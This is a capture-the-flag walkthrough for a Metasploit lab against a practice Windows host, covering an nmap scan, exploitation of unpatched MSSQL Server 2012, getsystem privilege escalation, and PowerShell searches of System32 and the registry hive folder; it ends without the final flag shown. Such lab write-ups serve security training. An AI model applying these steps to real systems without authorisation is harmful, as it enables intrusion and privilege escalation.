Host & Network Penetration Testing: The Metasploit Framework CTF 1

Windows systems are common targets in penetration testing due to their extensive use in corporate environments. This lab focuses on exploiting Windows-based services and configurations using the Metasploit Framework (MSF). Participants will gain hands-on experience accessing vulnerable services, exploring sensitive directories, and escalating privileges to retrieve hidden information.

The objective is to highlight the risks associated with misconfigured accounts, exposed directories, and improper privilege management in Windows environments.

In this lab environment, you will have GUI access to a Kali machine. The target machine will be accessible at target.ine.local.

Objective: Use Metasploit and manual investigation techniques to capture the following flags:

  • Flag 1: Gain access to the MSSQLSERVER account on the target machine to retrieve the first flag.

  • Flag 2: Locate the second flag within the Windows configuration folder.

  • Flag 3: The third flag is also hidden within the system directory. Find it to uncover a hint for accessing the final flag.

  • Flag 4: Investigate the Administrator directory to find the fourth flag.

Scanning

┌──(root㉿INE)-[~]
└─# sudo nmap -sC -sV -O target.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-14 17:55 IST
Stats: 0:01:22 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.48% done; ETC: 17:56 (0:00:00 remaining)
Nmap scan report for target.ine.local (10.5.24.70)
Host is up (0.0022s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2012 11.00.6020.00; SP3
| ms-sql-info: 
|   10.5.24.70\MSSQLSERVER: 
|     Instance name: MSSQLSERVER
|     Version: 
|       name: Microsoft SQL Server 2012 SP3
|       number: 11.00.6020.00
|       Product: Microsoft SQL Server 2012
|       Service pack level: SP3
|       Post-SP patches applied: false
|     TCP port: 1433
|_    Clustered: false
| ms-sql-ntlm-info: 
|   10.5.24.70\MSSQLSERVER: 
|     Target_Name: WIN-5BQ22OKH4SO
|     NetBIOS_Domain_Name: WIN-5BQ22OKH4SO
|     NetBIOS_Computer_Name: WIN-5BQ22OKH4SO
|     DNS_Domain_Name: WIN-5BQ22OKH4SO

Nmap shows MSSQL Server on port 1433, version SQL Server 2012 SP3 (build 11.00.6020.00) with no post-SP patches applied, so we can search for an exploit that matches this version.

Exploiting MSSQL server

Metasploit ships modules for MSSQL, so we can use it for the rest of the attack.

Start Metasploit by typing msfconsole. Once inside Metasploit, search for modules related to MSSQL 2012 using search MSSQL 2012 and pick the one that matches the version found by nmap.

  • Select the exploit, set its required options, and run it.

When the module runs successfully we have a session, which runs in the context of the MSSQL service account and satisfies the first objective.

Navigate to the root of the C: drive and read the first flag.

For the second flag, we want the Windows configuration folder, C:\Windows\System32\config, which holds the registry hives (SAM, SYSTEM, SECURITY and so on). From the shell, navigate towards it with cd Windows\System32 and then cd config.

Privilege Escalation using getsystem

The listing is refused: the current account has no access to the config directory. To understand why, we first need to review our privileges. Get back to the Meterpreter session by typing exit in the shell (or pressing Ctrl + C and confirming), then type getprivs to view the privileges the current user has.

These privileges belong to the MSSQL service account. If SeImpersonatePrivilege is among them, getsystem is likely to succeed using its Named Pipe Impersonation technique, so run getsystem to elevate to SYSTEM.

We have elevated our privileges. Now we can use the shell command again to get a shell and continue searching for the second flag.

We have successfully entered the config directory. Type dir to list the contents.

We have found the second flag. To read its contents, use the command type flag2.txt.
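As an added example (not part of the original walkthrough), the following PowerShell, typed into the cmd.exe shell obtained from Meterpreter (start it with powershell), shows what to check before and after getsystem: the current identity, whether SeImpersonatePrivilege is held, and the ACL on the config folder that explains the earlier access denial. It assumes PowerShell is present on the target, which it is on the Windows Server versions nmap reported.

```powershell
# Added example, not the walkthrough's own commands. Run inside the shell
# opened by Meterpreter's `shell` command (type `powershell` first).
# Steps 1 and 2 belong before getsystem, step 3 after it.

# 1. Current identity and the two privileges that getsystem's Named Pipe
#    Impersonation technique relies on. Service accounts such as the MSSQL
#    service account normally hold SeImpersonatePrivilege.
whoami
whoami /priv | findstr /i "SeImpersonatePrivilege SeAssignPrimaryTokenPrivilege"

# 2. Why the config folder was unreadable: by default its ACL grants access
#    to SYSTEM and Administrators only, and the service account is in neither.
icacls C:\Windows\System32\config

# 3. After `getsystem` (run from Meterpreter, then `shell` again), confirm the
#    token is NT AUTHORITY\SYSTEM and that the registry hive folder can now
#    be listed. -ErrorAction Stop makes a remaining access problem obvious.
whoami
Get-ChildItem -Path C:\Windows\System32\config -ErrorAction Stop |
    Select-Object Name, Length, LastWriteTime
```

If step 1 shows SeImpersonatePrivilege as Disabled that is still fine; the privilege only has to be present in the token, and getsystem enables it itself.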

Searching recursively for flag

The objective says the third flag is also hidden within the system directory, but we don't know its exact location. We do know that the flag files end with .txt, so we can search for those files recursively with the following command:

This command searches for all .txt files within the System32 directory and its subdirectories.

We see a file named EscalatePrivilageToGetThisFlag.txt. To read its contents, type the following command:
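The recursive search, written out as an added PowerShell example (not the walkthrough's own command). It assumes C:\Windows\System32 is the search root the hint points at, lists every .txt file beneath it with its size and first line, and continues past directories the current token is not allowed to read instead of stopping at the first access-denied error. The cmd.exe equivalent for just the paths is dir /s /b C:\Windows\System32\*.txt.

```powershell
# Added example, not the walkthrough's own command. PowerShell 2.0 compatible,
# so it also runs on the older Server builds nmap fingerprinted.
$root = 'C:\Windows\System32'   # assumed search root, per the hint

Get-ChildItem -Path $root -Filter *.txt -Recurse -ErrorAction SilentlyContinue |
    # Drop directories; -Filter matches names, not object types
    Where-Object { -not $_.PSIsContainer } |
    # Show the path, the size, and the first line so flag-like files stand out
    Select-Object FullName, Length,
        @{ Name = 'FirstLine'
           Expression = { Get-Content -Path $_.FullName -TotalCount 1 -ErrorAction SilentlyContinue } } |
    # Flag files are tiny, so sorting by size puts them at the top
    Sort-Object Length |
    Format-Table -AutoSize -Wrap
```

Running it before and after getsystem is worth doing: the list grows once the SYSTEM token can descend into directories the service account could not, which is exactly the case the third flag's file name hints at.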

Flag 4: Administrator’s Desktop

Since we have already elevated our privileges, let’s navigate to the Administrator directory to find the fourth flag.

To list the contents, type dir. Then navigate to the Desktop directory.

And here we have found our last flag, which is:
